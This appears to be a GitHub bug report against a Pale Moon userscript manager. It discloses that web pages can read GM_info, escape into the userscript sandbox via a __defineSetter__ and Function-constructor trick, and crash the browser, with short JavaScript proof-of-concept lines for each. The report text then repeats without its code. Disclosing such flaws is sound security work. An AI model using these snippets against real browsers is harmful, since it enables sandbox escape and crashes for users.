Open xBZZZZ opened 3 years ago
note: there needs to be running userscript
web page can get GM_info object like this:
GM_info
open(location.href).__defineSetter__("GM_info",console.log)
web page can get sandbox object like this:
open("/").__defineSetter__("GM_info",v=>{ const sandbox=v.toString.constructor("return this")() console.log(sandbox) })
web page can CRASH pale moon like this:
open("/").__defineSetter__("GM_info",v=>{ const sandbox=v.toString.constructor("return this")() new sandbox.XPCNativeWrapper(1) })
@xBZZZZ
We could use someone to fork this in general, it seems to be either dormant or gone...
If you knew how to fix, feel free.
note: there needs to be running userscript
web page can get
GM_info
object like this:web page can get sandbox object like this:
web page can CRASH pale moon like this: